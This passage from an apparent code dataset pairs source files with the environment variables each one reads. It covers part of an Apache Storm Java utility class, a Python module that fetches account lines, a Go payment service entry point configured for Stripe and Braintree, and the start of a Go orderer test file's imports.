memoryOpts = memoryOpts.toLowerCase();
if (memoryOpts.endsWith("k")) {
unit = 1024;
} else if (memoryOpts.endsWith("m")) {
unit = 1024 * 1024;
} else if (memoryOpts.endsWith("g")) {
unit = 1024 * 1024 * 1024;
}
memoryOpts = memoryOpts.replaceAll("[a-zA-Z]", "");
Double result = Double.parseDouble(memoryOpts) * unit / 1024.0 / 1024.0;
return (result < 1.0) ? 1.0 : result;
} else {
return defaultValue;
}
} else {
return defaultValue;
}
}
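// Illustrative examples for parseJvmHeapMemByChildOpts above (not part of the original source):
//   parseJvmHeapMemByChildOpts("-Xms256m -Xmx2g", 768.0) -> 2048.0 (last -Xmx match wins, converted to MB)
//   parseJvmHeapMemByChildOpts("-server", 768.0)         -> 768.0  (no -Xmx setting, the default is returned)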
@VisibleForTesting
public static void setClassLoaderForJavaDeSerialize(ClassLoader cl) {
Utils.cl = cl;
}
@VisibleForTesting
public static void resetClassLoaderForJavaDeSerialize() {
Utils.cl = ClassLoader.getSystemClassLoader();
}
public static TopologyInfo getTopologyInfo(String name, String asUser, Map stormConf) {
try (NimbusClient client = NimbusClient.getConfiguredClientAs(stormConf, asUser)) {
String topologyId = getTopologyId(name, client.getClient());
if (null != topologyId) {
return client.getClient().getTopologyInfo(topologyId);
}
return null;
} catch(Exception e) {
throw new RuntimeException(e);
}
}
public static String getTopologyId(String name, Nimbus.Client client) {
try {
ClusterSummary summary = client.getClusterInfo();
for(TopologySummary s : summary.get_topologies()) {
if(s.get_name().equals(name)) {
return s.get_id();
}
}
} catch(Exception e) {
throw new RuntimeException(e);
}
return null;
}
/**
* A cheap way to deterministically convert a number to a positive value. When the input is
* positive, the original value is returned. When the input number is negative, the returned
* positive value is the original value bitwise-ANDed with Integer.MAX_VALUE (0x7fffffff), which
* is not its absolute value.
*
* @param number a given number
* @return a positive number.
*/
public static int toPositive(int number) {
return number & Integer.MAX_VALUE;
}
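// Illustrative values for toPositive above (not part of the original source):
//   toPositive(7)  -> 7
//   toPositive(-3) -> 2147483645 (0x7ffffffd), i.e. not Math.abs(-3)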
public static GlobalStreamId getGlobalStreamId(String streamId, String componentId) {
if (componentId == null) {
return new GlobalStreamId(streamId, DEFAULT_STREAM_ID);
}
return new GlobalStreamId(streamId, componentId);
}
public static RuntimeException wrapInRuntime(Exception e){
if (e instanceof RuntimeException){
return (RuntimeException)e;
} else {
return new RuntimeException(e);
}
}
public static int getAvailablePort(int preferredPort) {
int localPort = -1;
try (ServerSocket socket = new ServerSocket(preferredPort)) {
localPort = socket.getLocalPort();
} catch (IOException exp) {
if (preferredPort > 0) {
return getAvailablePort(0);
}
}
return localPort;
}
public static int getAvailablePort() {
return getAvailablePort(0);
}
/**
* Determines if a zip archive contains a particular directory.
*
* @param zipfile path to the zipped file
* @param target directory being looked for in the zip.
* @return boolean whether or not the directory exists in the zip.
*/
public static boolean zipDoesContainDir(String zipfile, String target) throws IOException {
String targetDir = target + "/";
// Use try-with-resources so the ZipFile handle is closed instead of being leaked.
try (ZipFile zip = new ZipFile(zipfile)) {
List<ZipEntry> entries = (List<ZipEntry>) Collections.list(zip.entries());
for (ZipEntry entry : entries) {
String name = entry.getName();
if (name.startsWith(targetDir)) {
return true;
}
}
}
return false;
}
/**
* Joins any number of maps together into a single map, combining their values into
* a list, maintaining values in the order the maps were passed in. Nulls are inserted
* for given keys when the map does not contain that key.
*
* i.e. joinMaps({'a' => 1, 'b' => 2}, {'b' => 3}, {'a' => 4, 'c' => 5}) ->
* {'a' => [1, null, 4], 'b' => [2, 3, null], 'c' => [null, null, 5]}
*
* @param maps variable number of maps to join - order affects order of values in output.
* @return combined map
*/
public static <K, V> Map<K, List<V>> joinMaps(Map<K, V>... maps) {
Map<K, List<V>> ret = new HashMap<>();
Set<K> keys = new HashSet<>();
for(Map<K, V> map : maps) {
keys.addAll(map.keySet());
}
for(Map<K, V> m : maps) {
for(K key : keys) {
V value = m.get(key);
if(!ret.containsKey(key)) {
ret.put(key, new ArrayList<V>());
}
List<V> targetList = ret.get(key);
targetList.add(value);
}
}
return ret;
}
/**
* Fills up chunks out of a collection (given a maximum amount of chunks)
*
* i.e. partitionFixed(5, [1,2,3]) -> [[1], [2], [3]]
* partitionFixed(5, [1..9]) -> [[1,2], [3,4], [5,6], [7,8], [9]]
* partitionFixed(3, [1..10]) -> [[1,2,3,4], [5,6,7], [8,9,10]]
* @param maxNumChunks the maximum number of chunks to return
* @param coll the collection to be chunked up
* @return a list of the chunks, which are themselves lists.
*/
public static <T> List<List<T>> partitionFixed(int maxNumChunks, Collection<T> coll) {
List<List<T>> ret = new ArrayList<>();
if(maxNumChunks == 0 || coll == null) {
return ret;
}
Map<Integer, Integer> parts = integerDivided(coll.size(), maxNumChunks);
// Keys sorted in descending order
List<Integer> sortedKeys = new ArrayList<Integer>(parts.keySet());
Collections.sort(sortedKeys, Collections.reverseOrder());
Iterator<T> it = coll.iterator();
for(Integer chunkSize : sortedKeys) {
if(!it.hasNext()) { break; }
Integer times = parts.get(chunkSize);
for(int i = 0; i < times; i++) {
if(!it.hasNext()) { break; }
List<T> chunkList = new ArrayList<>();
for(int j = 0; j < chunkSize; j++) {
if(!it.hasNext()) { break; }
chunkList.add(it.next());
}
ret.add(chunkList);
}
}
return ret;
}
/**
* Return a new instance of a pluggable specified in the conf.
* @param conf The conf to read from.
* @param configKey The key pointing to the pluggable class
* @return an instance of the class or null if it is not specified.
*/
public static Object getConfiguredClass(Map conf, Object configKey) {
if (conf.containsKey(configKey)) {
return newInstance((String)conf.get(configKey));
}
return null;
}
public static String logsFilename(String stormId, String port) {
return stormId + FILE_PATH_SEPARATOR + port + FILE_PATH_SEPARATOR + "worker.log";
}
public static String eventLogsFilename(String stormId, String port) {
return stormId + FILE_PATH_SEPARATOR + port + FILE_PATH_SEPARATOR + "events.log";
}
public static Object readYamlFile(String yamlFile) {
try (FileReader reader = new FileReader(yamlFile)) {
return new Yaml(new SafeConstructor()).load(reader);
} catch(Exception ex) {
LOG.error("Failed to read yaml file.", ex);
}
return null;
}
public static void setupDefaultUncaughtExceptionHandler() {
Thread.setDefaultUncaughtExceptionHandler(new Thread.UncaughtExceptionHandler() {
public void uncaughtException(Thread thread, Throwable thrown) {
try {
handleUncaughtException(thrown);
} catch (Error err) {
LOG.error("Received error in main thread.. terminating server...", err);
Runtime.getRuntime().exit(-2);
}
}
});
}
/**
* Creates a new map with a string value in the map replaced with an
* equally long string of '#' characters.
* @param m The map that a value will be redacted from
* @param key The key pointing to the value to be redacted
* @return a new map with the value redacted. The original map will not be modified.
*/
public static Map<Object, String> redactValue(Map<Object, String> m, Object key) {
if(m.containsKey(key)) {
HashMap<Object, String> newMap = new HashMap<>(m);
String value = newMap.get(key);
String redacted = new String(new char[value.length()]).replace("\0", "#");
newMap.put(key, redacted);
return newMap;
}
return m;
}
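// Illustrative example for redactValue above (not part of the original source; key and value are hypothetical):
//   redactValue({"java.keystore.password" -> "secret"}, "java.keystore.password")
//     -> {"java.keystore.password" -> "######"}   (the original map is left untouched)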
private static final Set<String> disallowedKeys = new HashSet<>(Arrays.asList(new String[] {"/", ".", ":", "\\"}));
/**
* Make sure a given key name is valid for the storm config.
* Throws a RuntimeException if the key isn't valid.
* @param name The name of the config key to check.
*/
public static void validateKeyName(String name) {
for(String key : disallowedKeys) {
if( name.contains(key) ) {
throw new RuntimeException("Key name cannot contain any of the following: " + disallowedKeys.toString());
}
}
if(name.trim().isEmpty()) {
throw new RuntimeException("Key name cannot be blank");
}
}
/**
* Find the first item of coll for which pred.test(...) returns true.
* @param pred The IPredicate to test for
* @param coll The Collection of items to search through.
* @return The first matching value in coll, or null if nothing matches.
*/
public static <T> T findOne (IPredicate<T> pred, Collection<T> coll) {
if(coll == null) {
return null;
}
for(T elem : coll) {
if (pred.test(elem)) {
return elem;
}
}
return null;
}
public static <T, U> T findOne (IPredicate<T> pred, Map<U, T> map) {
if(map == null) {
return null;
}
return findOne(pred, map.values());
}
public static String localHostname () throws UnknownHostException {
return _instance.localHostnameImpl();
}
// Non-static impl methods exist for mocking purposes.
protected String localHostnameImpl () throws UnknownHostException {
return InetAddress.getLocalHost().getCanonicalHostName();
}
private static String memoizedLocalHostnameString = null;
public static String memoizedLocalHostname () throws UnknownHostException {
if (memoizedLocalHostnameString == null) {
memoizedLocalHostnameString = localHostname();
}
return memoizedLocalHostnameString;
}
/**
* Gets the storm.local.hostname value, or tries to figure out the local hostname
* if it is not set in the config.
* @param conf The storm config to read from
* @return a string representation of the hostname.
*/
public static String hostname (Map<String, Object> conf) throws UnknownHostException {
if (conf == null) {
return memoizedLocalHostname();
}
Object hostnameString = conf.get(Config.STORM_LOCAL_HOSTNAME);
if (hostnameString == null || hostnameString.equals("")) {
return memoizedLocalHostname();
}
return (String)hostnameString;
}
public static String uuid() {
return UUID.randomUUID().toString();
}
public static void exitProcess (int val, String msg) {
String combinedErrorMessage = "Halting process: " + msg;
LOG.error(combinedErrorMessage, new RuntimeException(combinedErrorMessage));
Runtime.getRuntime().exit(val);
}
/**
* "{:a 1 :b 1 :c 2} -> {1 [:a :b] 2 :c}"
*
* Example usage in java:
* Map<Integer, String> tasks;
* Map<String, List<Integer>> componentTasks = Utils.reverseMap(tasks);
*
* The order of the resulting list values depends on the ordering properties
* of the Map passed in. The caller is responsible for passing an ordered
* map if they expect the result to be consistently ordered as well.
*
* @param map to reverse
* @return a reversed map
*/
public static <K, V> HashMap<V, List<K>> reverseMap(Map<K, V> map) {
HashMap<V, List<K>> rtn = new HashMap<V, List<K>>();
if (map == null) {
return rtn;
}
for (Entry<K, V> entry : map.entrySet()) {
K key = entry.getKey();
V val = entry.getValue();
List<K> list = rtn.get(val);
if (list == null) {
list = new ArrayList<K>();
rtn.put(entry.getValue(), list);
}
list.add(key);
}
return rtn;
}
/**
* "[[:a 1] [:b 1] [:c 2]} -> {1 [:a :b] 2 :c}"
* Reverses an assoc-list style Map like reverseMap(Map...)
*
* @param listSeq to reverse
* @return a reversed map
*/
public static HashMap reverseMap(List listSeq) {
HashMap<Object, List<Object>> rtn = new HashMap();
if (listSeq == null) {
return rtn;
}
for (Object entry : listSeq) {
List listEntry = (List) entry;
Object key = listEntry.get(0);
Object val = listEntry.get(1);
List list = rtn.get(val);
if (list == null) {
list = new ArrayList<Object>();
rtn.put(val, list);
}
list.add(key);
}
return rtn;
}
/**
* @return the pid of this JVM, because Java doesn't provide a real way to do this.
*/
public static String processPid() {
String name = ManagementFactory.getRuntimeMXBean().getName();
String[] split = name.split("@");
if (split.length != 2) {
throw new RuntimeException("Got unexpected process name: " + name);
}
return split[0];
}
public static int execCommand(String... command) throws ExecuteException, IOException {
CommandLine cmd = new CommandLine(command[0]);
for (int i = 1; i < command.length; i++) {
cmd.addArgument(command[i]);
}
DefaultExecutor exec = new DefaultExecutor();
return exec.execute(cmd);
}
/**
* Extract dir from the jar to destdir
*
* @param jarpath Path to the jar file
* @param dir Directory in the jar to pull out
* @param destdir Path to the directory where the extracted directory will be put
*
*/
public static void extractDirFromJar(String jarpath, String dir, String destdir) {
try (JarFile jarFile = new JarFile(jarpath)) {
Enumeration<JarEntry> jarEnums = jarFile.entries();
while (jarEnums.hasMoreElements()) {
JarEntry entry = jarEnums.nextElement();
if (!entry.isDirectory() && entry.getName().startsWith(dir)) {
File aFile = new File(destdir, entry.getName());
aFile.getParentFile().mkdirs();
try (FileOutputStream out = new FileOutputStream(aFile);
InputStream in = jarFile.getInputStream(entry)) {
IOUtils.copy(in, out);
}
}
}
} catch (IOException e) {
LOG.info("Could not extract {} from {}", dir, jarpath);
}
}
public static void sendSignalToProcess(long lpid, int signum) throws IOException {
String pid = Long.toString(lpid);
try {
if (isOnWindows()) {
if (signum == SIGKILL) {
execCommand("taskkill", "/f", "/pid", pid);
} else {
execCommand("taskkill", "/pid", pid);
}
} else {
execCommand("kill", "-" + signum, pid);
}
} catch (ExecuteException e) {
LOG.info("Error when trying to kill {}. Process is probably already dead.", pid);
} catch (IOException e) {
LOG.info("IOException Error when trying to kill {}.", pid);
throw e;
}
}
public static void forceKillProcess (String pid) throws IOException {
sendSignalToProcess(Long.parseLong(pid), SIGKILL);
}
public static void killProcessWithSigTerm (String pid) throws IOException {
sendSignalToProcess(Long.parseLong(pid), SIGTERM);
}
/**
* Adds the user supplied function as a shutdown hook for cleanup.
* Also adds a function that sleeps for a second and then halts the
* runtime to avoid any zombie process in case the cleanup function hangs.
*/
public static void addShutdownHookWithForceKillIn1Sec (Runnable func) {
Runnable sleepKill = new Runnable() {
@Override
public void run() {
try {
Time.sleepSecs(1);
Runtime.getRuntime().halt(20);
} catch (Exception e) {
LOG.warn("Exception in the ShutDownHook", e);
}
}
};
Runtime.getRuntime().addShutdownHook(new Thread(func));
Runtime.getRuntime().addShutdownHook(new Thread(sleepKill));
}
/**
* Returns the combined string, escaped for posix shell.
* @param command the list of strings to be combined
* @return the resulting command string
*/
public static String shellCmd (List<String> command) {
List<String> changedCommands = new ArrayList<>(command.size());
for (String str: command) {
if (str == null) {
continue;
}
changedCommands.add("'" + str.replaceAll("'", "'\"'\"'") + "'");
}
return StringUtils.join(changedCommands, " ");
}
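// Illustrative example for shellCmd above (not part of the original source):
//   shellCmd(Arrays.asList("echo", "it's done")) -> 'echo' 'it'"'"'s done'
// Single quotes inside an argument are escaped with the usual '"'"' posix idiom; null entries are skipped.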
public static String scriptFilePath (String dir) {
return dir + FILE_PATH_SEPARATOR + "storm-worker-script.sh";
}
public static String containerFilePath (String dir) {
return dir + FILE_PATH_SEPARATOR + "launch_container.sh";
}
public static Object nullToZero (Object v) {
return (v != null ? v : 0);
}
/**
* Deletes a file or directory and its contents if it exists. Does not
* complain if the input is null or does not exist.
* @param path the path to the file or directory
*/
public static void forceDelete(String path) throws IOException {
_instance.forceDeleteImpl(path);
}
// Non-static impl methods exist for mocking purposes.
protected void forceDeleteImpl(String path) throws IOException {
LOG.debug("Deleting path {}", path);
if (checkFileExists(path)) {
try {
FileUtils.forceDelete(new File(path));
} catch (FileNotFoundException ignored) {}
}
}
/**
* Creates a symbolic link to the target
* @param dir the parent directory of the link
* @param targetDir the parent directory of the link's target
* @param targetFilename the file name of the link's target
* @param filename the file name of the link
* @throws IOException
*/
public static void createSymlink(String dir, String targetDir,
String targetFilename, String filename) throws IOException {
Path path = Paths.get(dir, filename).toAbsolutePath();
Path target = Paths.get(targetDir, targetFilename).toAbsolutePath();
LOG.debug("Creating symlink [{}] to [{}]", path, target);
if (!path.toFile().exists()) {
Files.createSymbolicLink(path, target);
}
}
/**
* Convenience method for the case when the link's file name should be the
* same as the file name of the target
*/
public static void createSymlink(String dir, String targetDir,
String targetFilename) throws IOException {
Utils.createSymlink(dir, targetDir, targetFilename,
targetFilename);
}
/**
* Returns a Collection of file names found under the given directory.
* @param dir a directory
* @return the Collection of file names
*/
public static Collection<String> readDirContents(String dir) {
Collection<String> ret = new HashSet<>();
File[] files = new File(dir).listFiles();
if (files != null) {
for (File f: files) {
ret.add(f.getName());
}
}
return ret;
}
/**
* Returns the value of java.class.path System property. Kept separate for
* testing.
* @return the classpath
*/
public static String currentClasspath() {
return _instance.currentClasspathImpl();
}
// Non-static impl methods exist for mocking purposes.
public String currentClasspathImpl() {
return System.getProperty("java.class.path");
}
/**
* Returns the full paths of the jar files found under the given directory.
* @param dir the directory to search
* @return the jar file paths
*/
private static List<String> getFullJars(String dir) {
File[] files = new File(dir).listFiles(jarFilter);
if(files == null) {
return new ArrayList<>();
}
List<String> ret = new ArrayList<>(files.length);
for (File f : files) {
ret.add(Paths.get(dir, f.getName()).toString());
}
return ret;
}
private static final FilenameFilter jarFilter = new FilenameFilter() {
@Override
public boolean accept(File dir, String name) {
return name.endsWith(".jar");
}
};
public static String workerClasspath() {
String stormDir = System.getProperty("storm.home");
if (stormDir == null) {
return Utils.currentClasspath();
}
String stormLibDir = Paths.get(stormDir, "lib").toString();
String stormConfDir =
System.getenv("STORM_CONF_DIR") != null ?
System.getenv("STORM_CONF_DIR") :
Paths.get(stormDir, "conf").toString();
String stormExtlibDir = Paths.get(stormDir, "extlib").toString();
String extcp = System.getenv("STORM_EXT_CLASSPATH");
List<String> pathElements = new LinkedList<>();
pathElements.addAll(Utils.getFullJars(stormLibDir));
pathElements.addAll(Utils.getFullJars(stormExtlibDir));
pathElements.add(extcp);
pathElements.add(stormConfDir);
return StringUtils.join(pathElements,
CLASS_PATH_SEPARATOR);
}
public static String addToClasspath(String classpath,
Collection<String> paths) {
return _instance.addToClasspathImpl(classpath, paths);
}
// Non-static impl methods exist for mocking purposes.
public String addToClasspathImpl(String classpath,
Collection<String> paths) {
if (paths == null || paths.isEmpty()) {
return classpath;
}
List<String> l = new LinkedList<>();
l.add(classpath);
l.addAll(paths);
return StringUtils.join(l, CLASS_PATH_SEPARATOR);
}
public static class UptimeComputer {
int startTime = 0;
public UptimeComputer() {
startTime = Time.currentTimeSecs();
}
public int upTime() {
return Time.deltaSecs(startTime);
}
}
public static UptimeComputer makeUptimeComputer() {
return _instance.makeUptimeComputerImpl();
}
// Non-static impl methods exist for mocking purposes.
public UptimeComputer makeUptimeComputerImpl() {
return new UptimeComputer();
}
/**
* Writes a posix shell script file to be executed in its own process.
* @param dir the directory under which the script is to be written
* @param command the command the script is to execute
* @param environment optional environment variables to set before running the script's command. May be null.
* @return the path to the script that has been written
*/
public static String writeScript(String dir, List<String> command,
Map<String,String> environment) throws IOException {
String path = Utils.scriptFilePath(dir);
try(BufferedWriter out = new BufferedWriter(new FileWriter(path))) {
out.write("#!/bin/bash");
out.newLine();
if (environment != null) {
for (String k : environment.keySet()) {
String v = environment.get(k);
if (v == null) {
v = "";
}
out.write(Utils.shellCmd(
Arrays.asList(
"export",k+"="+v)));
out.write(";");
out.newLine();
}
}
out.newLine();
out.write("exec "+Utils.shellCmd(command)+";");
}
return path;
}
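// For reference, a script produced by writeScript above looks roughly like this
// (command and environment are hypothetical):
//   #!/bin/bash
//   'export' 'JAVA_HOME=/usr/lib/jvm';
//
//   exec 'java' '-cp' 'app.jar' 'Main';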
/**
* A thread that can answer if it is sleeping in the case of simulated time.
* This class is not useful when simulated time is not being used.
*/
public static class SmartThread extends Thread {
public boolean isSleeping() {
return Time.isThreadWaiting(this);
}
public SmartThread(Runnable r) {
super(r);
}
}
/**
* Creates a thread that calls the given code repeatedly, sleeping for an
* interval of seconds equal to the return value of the previous call.
*
* The given afn may be a callable that returns the number of seconds to
* sleep, or it may be a Callable that returns another Callable that in turn
* returns the number of seconds to sleep. In the latter case, isFactory should be set to true.
*
* @param afn the code to call on each iteration
* @param isDaemon whether the new thread should be a daemon thread
* @param eh code to call when afn throws an exception
* @param priority the new thread's priority
* @param isFactory whether afn returns a callable instead of sleep seconds
* @param startImmediately whether to start the thread before returning
* @param threadName a suffix to be appended to the thread name
* @return the newly created thread
* @see java.lang.Thread
*/
public static SmartThread asyncLoop(final Callable afn,
boolean isDaemon, final Thread.UncaughtExceptionHandler eh,
int priority, final boolean isFactory, boolean startImmediately,
String threadName) {
SmartThread thread = new SmartThread(new Runnable() {
public void run() {
Object s;
try {
Callable fn = isFactory ? (Callable) afn.call() : afn;
while ((s = fn.call()) instanceof Long) {
Time.sleepSecs((Long) s);
}
} catch (Throwable t) {
if (Utils.exceptionCauseIsInstanceOf(
InterruptedException.class, t)) {
LOG.info("Async loop interrupted!");
return;
}
LOG.error("Async loop died!", t);
throw new RuntimeException(t);
}
}
});
if (eh != null) {
thread.setUncaughtExceptionHandler(eh);
} else {
thread.setUncaughtExceptionHandler(new Thread.UncaughtExceptionHandler() {
public void uncaughtException(Thread t, Throwable e) {
LOG.error("Async loop died!", e);
Utils.exitProcess(1, "Async loop died!");
}
});
}
thread.setDaemon(isDaemon);
thread.setPriority(priority);
if (threadName != null && !threadName.isEmpty()) {
thread.setName(thread.getName() +"-"+ threadName);
}
if (startImmediately) {
thread.start();
}
return thread;
}
/**
* Convenience method used when only the function and name suffix are given.
* @param afn the code to call on each iteration
* @param threadName a suffix to be appended to the thread name
* @return the newly created thread
* @see java.lang.Thread
*/
public static SmartThread asyncLoop(final Callable afn, String threadName, final Thread.UncaughtExceptionHandler eh) {
return asyncLoop(afn, false, eh, Thread.NORM_PRIORITY, false, true,
threadName);
}
/**
* Convenience method used when only the function is given.
* @param afn the code to call on each iteration
* @return the newly created thread
*/
public static SmartThread asyncLoop(final Callable afn) {
return asyncLoop(afn, false, null, Thread.NORM_PRIORITY, false, true,
null);
}
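// Illustrative usage sketch for the asyncLoop helpers above (not part of the original source; the helper is hypothetical):
//   Utils.SmartThread heartbeat = Utils.asyncLoop(new Callable() {
//       public Object call() throws Exception {
//           sendHeartbeat();   // hypothetical helper
//           return 5L;         // sleep 5 seconds and run again; any non-Long return ends the loop
//       }
//   }, "heartbeat", null);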
/**
* A callback that can accept an integer.
* @param <V> the result type of method <code>call</code>
*/
public interface ExitCodeCallable<V> extends Callable<V> {
V call(int exitCode);
}
/**
* Launch a new process as per {@link java.lang.ProcessBuilder} with a given
* callback.
* @param command the command to be executed in the new process
* @param environment the environment to be applied to the process. Can be
* null.
* @param logPrefix a prefix for log entries from the output of the process.
* Can be null.
* @param exitCodeCallback code to be called passing the exit code value
* when the process completes
* @param dir the working directory of the new process
* @return the new process
* @throws IOException
* @see java.lang.ProcessBuilder
*/
public static Process launchProcess(List<String> command,
Map<String,String> environment,
final String logPrefix,
final ExitCodeCallable exitCodeCallback,
File dir)
throws IOException {
return _instance.launchProcessImpl(command, environment, logPrefix,
exitCodeCallback, dir);
}
public Process launchProcessImpl(
List<String> command,
Map<String,String> cmdEnv,
final String logPrefix,
final ExitCodeCallable exitCodeCallback,
File dir)
throws IOException {
ProcessBuilder builder = new ProcessBuilder(command);
Map<String,String> procEnv = builder.environment();
if (dir != null) {
builder.directory(dir);
}
builder.redirectErrorStream(true);
if (cmdEnv != null) {
procEnv.putAll(cmdEnv);
}
final Process process = builder.start();
if (logPrefix != null || exitCodeCallback != null) {
Utils.asyncLoop(new Callable() {
public Object call() {
if (logPrefix != null ) {
Utils.readAndLogStream(logPrefix,
process.getInputStream());
}
if (exitCodeCallback != null) {
try {
process.waitFor();
} catch (InterruptedException ie) {
LOG.info("{} interrupted", logPrefix);
}
// Report the exit code whether the wait finished normally or was interrupted,
// as documented for exitCodeCallback.
exitCodeCallback.call(process.exitValue());
}
return null; // Run only once.
}
});
}
return process;
}
public static <T> List<T> interleaveAll(List<List<T>> nodeList) {
if (nodeList != null && nodeList.size() > 0) {
List<T> first = new ArrayList<T>();
List<List<T>> rest = new ArrayList<List<T>>();
for (List<T> node : nodeList) {
if (node != null && node.size() > 0) {
first.add(node.get(0));
rest.add(node.subList(1, node.size()));
}
}
List<T> interleaveRest = interleaveAll(rest);
if (interleaveRest != null) {
first.addAll(interleaveRest);
}
return first;
}
return null;
}
public static long bitXor(Long a, Long b) {
return a ^ b;
}
public static List<String> getRepeat(List<String> list) {
List<String> rtn = new ArrayList<String>();
Set<String> idSet = new HashSet<String>();
for (String id : list) {
if (idSet.contains(id)) {
rtn.add(id);
} else {
idSet.add(id);
}
}
return rtn;
}
}
| [
"\"OS\"",
"\"OS\"",
"\"OS\"",
"\"STORM_CONF_DIR\"",
"\"STORM_CONF_DIR\"",
"\"STORM_EXT_CLASSPATH\""
]
| []
| [
"STORM_EXT_CLASSPATH",
"STORM_CONF_DIR",
"OS"
]
| [] | ["STORM_EXT_CLASSPATH", "STORM_CONF_DIR", "OS"] | java | 3 | 0 | |
src/modules/lines.py | import datetime
import os
from typing import List
from models.line import Line
from modules.lines_data import update_line_data
from modules.lines_summary import fetch_lines_summary
from modules.logger import log, LogLevels
from modules.session_manager import SessionManager
def fetch_all_lines_list(session_manager: SessionManager) -> List[Line]:
"""
Retrieves a list with all the lines registered in the account (and their summarized data); the resulting Line
objects are saved to the configured output folder.
:param session_manager: SessionManager used to perform the requests
:return: list of Line objects
"""
log("Entering fetch_all_lines_list method", LogLevels.LOG_LEVEL_DEBUG)
lines_summary = fetch_lines_summary(session_manager=session_manager)
lines = [create_line_object(line_id=line['id'], session_manager=session_manager) for line in lines_summary]
lines_objects_folder = os.getenv('LINES_OBJECTS_FOLDER', '/data/models/lines')
log(f"Finished fetching {len(lines_summary)} lines! (objects saved to folder {lines_objects_folder})")
return lines
def create_line_object(line_id: int, session_manager: SessionManager) -> Line:
"""
Creates the Line object for the given ID and updates its data when the last update is older than the configured interval.
:param session_manager: SessionManager used to perform the requests
:param line_id: identifier of the line to build
:return: the (possibly updated) Line object
"""
log("Entering create_line_object method", LogLevels.LOG_LEVEL_DEBUG)
line = Line(id=line_id)
update_frequency_days = int(os.getenv('LINE_UPDATE_INTERVAL_DAYS', 2))
delta_days = (datetime.datetime.now() - line.last_updated_at).days if line.last_updated_at is not None else 0
if line.last_updated_at is not None and delta_days < update_frequency_days:
log(
"No need to update line {} (ID: {}) as only {} day(s) have passed since last update (expected {})".format(
line.name,
line.id,
delta_days,
update_frequency_days
),
LogLevels.LOG_LEVEL_NOTICE
)
return line
update_line_data(line=line, session_manager=session_manager)
return line
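# Illustrative environment configuration for this module (these are the defaults used when the variables are unset):
#   export LINES_OBJECTS_FOLDER=/data/models/lines   # folder reported for the saved Line objects
#   export LINE_UPDATE_INTERVAL_DAYS=2               # skip updating lines refreshed within the last N days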
| []
| []
| [
"LINE_UPDATE_INTERVAL_DAYS",
"LINES_OBJECTS_FOLDER"
]
| [] | ["LINE_UPDATE_INTERVAL_DAYS", "LINES_OBJECTS_FOLDER"] | python | 2 | 0 | |
main.go | package main
import (
"log"
"net/http"
"os"
"github.com/braintree-go/braintree-go"
"github.com/mackstann/payment_user_svc_exercise/internal/braintree_gateway"
"github.com/mackstann/payment_user_svc_exercise/internal/routes"
"github.com/mackstann/payment_user_svc_exercise/internal/service"
"github.com/mackstann/payment_user_svc_exercise/internal/store"
"github.com/mackstann/payment_user_svc_exercise/internal/stripe_gateway"
)
const addr = "127.0.0.1:8000"
var braintreeEnv = braintree.Sandbox
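// Illustrative environment setup expected by main below (hypothetical values, not part of the original source):
//   export STRIPE_KEY=sk_test_xxx
//   export BRAINTREE_MERCHANT_ID=xxx
//   export BRAINTREE_PUBLIC_KEY=xxx
//   export BRAINTREE_PRIVATE_KEY=xxx
// The server then listens on 127.0.0.1:8000.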
func main() {
stripeKey := os.Getenv("STRIPE_KEY")
if stripeKey == "" {
log.Fatal("Please set the STRIPE_KEY env var")
}
stripe := stripe_gateway.NewGateway(stripeKey)
braintreeMerchantID := os.Getenv("BRAINTREE_MERCHANT_ID")
braintreePublicKey := os.Getenv("BRAINTREE_PUBLIC_KEY")
braintreePrivateKey := os.Getenv("BRAINTREE_PRIVATE_KEY")
if braintreeMerchantID == "" {
log.Fatal("Please set the BRAINTREE_MERCHANT_ID env var")
}
if braintreePublicKey == "" {
log.Fatal("Please set the BRAINTREE_PUBLIC_KEY env var")
}
if braintreePrivateKey == "" {
log.Fatal("Please set the BRAINTREE_PRIVATE_KEY env var")
}
braintree := braintree_gateway.NewGateway(
braintreeEnv, braintreeMerchantID, braintreePublicKey, braintreePrivateKey)
store := store.NewStore()
svc := service.NewService(store, stripe, braintree)
r := routes.NewRouter(svc, addr)
srv := &http.Server{
Handler: r,
Addr: addr,
}
log.Fatal(srv.ListenAndServe())
}
| [
"\"STRIPE_KEY\"",
"\"BRAINTREE_MERCHANT_ID\"",
"\"BRAINTREE_PUBLIC_KEY\"",
"\"BRAINTREE_PRIVATE_KEY\""
]
| []
| [
"BRAINTREE_PUBLIC_KEY",
"BRAINTREE_PRIVATE_KEY",
"BRAINTREE_MERCHANT_ID",
"STRIPE_KEY"
]
| [] | ["BRAINTREE_PUBLIC_KEY", "BRAINTREE_PRIVATE_KEY", "BRAINTREE_MERCHANT_ID", "STRIPE_KEY"] | go | 4 | 0 | |
orderer/common/server/main_test.go | // Copyright IBM Corp. All Rights Reserved.
// SPDX-License-Identifier: Apache-2.0
package server
import (
"fmt"
"io/ioutil"
"net"
"net/http"
"os"
"os/exec"
"path/filepath"
"strconv"
"strings"
"testing"
"time"
"github.com/golang/protobuf/proto"
"github.com/hyperledger/fabric-protos-go/common"
"github.com/VoneChain-CS/fabric-gm/bccsp/factory"
"github.com/VoneChain-CS/fabric-gm/bccsp/sw"
"github.com/VoneChain-CS/fabric-gm/common/channelconfig"
"github.com/VoneChain-CS/fabric-gm/common/crypto/tlsgen"
deliver_mocks "github.com/VoneChain-CS/fabric-gm/common/deliver/mock"
"github.com/VoneChain-CS/fabric-gm/common/flogging"
"github.com/VoneChain-CS/fabric-gm/common/flogging/floggingtest"
"github.com/VoneChain-CS/fabric-gm/common/ledger/blockledger"
"github.com/VoneChain-CS/fabric-gm/common/ledger/blockledger/fileledger"
"github.com/VoneChain-CS/fabric-gm/common/metrics/disabled"
"github.com/VoneChain-CS/fabric-gm/common/metrics/prometheus"
"github.com/VoneChain-CS/fabric-gm/core/config/configtest"
"github.com/VoneChain-CS/fabric-gm/internal/configtxgen/encoder"
"github.com/VoneChain-CS/fabric-gm/internal/configtxgen/genesisconfig"
"github.com/VoneChain-CS/fabric-gm/internal/pkg/comm"
"github.com/VoneChain-CS/fabric-gm/internal/pkg/identity"
"github.com/VoneChain-CS/fabric-gm/orderer/common/bootstrap/file"
"github.com/VoneChain-CS/fabric-gm/orderer/common/cluster"
"github.com/VoneChain-CS/fabric-gm/orderer/common/localconfig"
"github.com/VoneChain-CS/fabric-gm/orderer/common/multichannel"
server_mocks "github.com/VoneChain-CS/fabric-gm/orderer/common/server/mocks"
"github.com/VoneChain-CS/fabric-gm/orderer/consensus"
"github.com/VoneChain-CS/fabric-gm/protoutil"
. "github.com/onsi/gomega"
"github.com/onsi/gomega/gexec"
"github.com/pkg/errors"
